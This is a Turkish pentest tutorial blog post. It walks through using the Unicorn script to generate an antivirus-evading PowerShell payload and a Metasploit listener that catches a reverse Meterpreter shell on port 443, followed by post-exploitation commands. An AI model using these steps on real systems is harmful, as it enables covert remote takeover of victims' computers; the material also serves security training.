Unicorn Betiği Kullanılarak Gerçekleştirilen Powershell Saldırısı ile Meterpreter Erişiminin Elde Edilmesi

Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, Unicorn aracı kullanılarak Powershell tabanlı bir payload hazırlanacak ve hedef bilgisayarda Powershell komutu çalıtırılarak Meterpreter kabuğu elde edilecektir.

Unicorn aracı, kurban sisteme payload hazırlanması için kullanılabilir. Bu araç kullanılarak, saldırgan tarafından payload hazırlacak ve kurban bilgisayarında çalıştırılan bir Powershell komutu ile bu payload çalıştırılacaktır. Kurban işletim sisteminde kurumlarda ve son kullanıcı bilgisayarlarında en çok kullanılan anti-virüslerden biri yüklü olmasına rağmen Meterpreter bağlantısının elde edilebildiği görülecektir.

Unicorn betiği Github sayfasından indirilir.

https://github.com/trustedsec/unicorn

acquiring-meterpreter-shell-by-powershell-attack-via-unicorn-script-01

İndirilen şıkıştırılmış dosya açılır.

ls
unzip unicorn-master.zip
ls
cd unicorn-master
ls -la

acquiring-meterpreter-shell-by-powershell-attack-via-unicorn-script-02

Betik çalıştırılacak şekilde ayarlanır ve manuel’i okunur.

chmod 744 unicorn.py
./unicorn.py –help

acquiring-meterpreter-shell-by-powershell-attack-via-unicorn-script-03

Payload ayarlanır. 443. TCP portundan Kali bilgisayarına (192.168.74.141) ters TCP Meterpreter bağlantısı elde edebilen Powershell saldırısına ait örnek komut aşağıdaki gibidir.

python unicorn.py windows/meterpreter/reverse_tcp 192.168.74.141 443

acquiring-meterpreter-shell-by-powershell-attack-via-unicorn-script-04

Komut çalışması tamamlandıktan sonra, “powershell_attack.txt” ve “unicorn.rc” dosyaları oluşmuştur.

ls

acquiring-meterpreter-shell-by-powershell-attack-via-unicorn-script-05

Oluşan 2 dosyanın içeriği aşağıdaki gibidir. “unicorn.rc” dosyası ise Meterpreter Multi/handler modülünü otomatik olarak başlatacak olan kaynak dosyadır (Resource File). “powershell_attack.txt” dosyasında ise, Powershell ile çalıştırılacak olan payload bulunur.

cat unicorn.rc
cat powershell_attack.txt

acquiring-meterpreter-shell-by-powershell-attack-via-unicorn-script-06

“unicorn.rc” kaynak dosyası kullanılarak Listener başlatılır ve payload’un görevini yaparak ters bir bağlantı talep etmesi beklenir.

msfconsole -r “unicorn.rc” -q

acquiring-meterpreter-shell-by-powershell-attack-via-unicorn-script-07

Windows istemci bilgisayarı üzerinde ise “powershell_attack.txt” dosya içeriğindeki payload çalıştırılır.

acquiring-meterpreter-shell-by-powershell-attack-via-unicorn-script-08

Böylece Kali tarafında talep yakalanmaktadır ve Meterpreter bağlantısının elde edildiği görülmektedir.

sessions
sessions -i 1
sysinfo

acquiring-meterpreter-shell-by-powershell-attack-via-unicorn-script-09

Powershell komutunu çalıştıran kullanıcı hakları ile 32 bitlik Powershell prosesi ile bağlantı oluşmuştur.

ps -U Yonetici
getpid

acquiring-meterpreter-shell-by-powershell-attack-via-unicorn-script-10

 

Kaynak:

https://www.trustedsec.com/july-2015/magic-unicorn-v2-0-released/

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.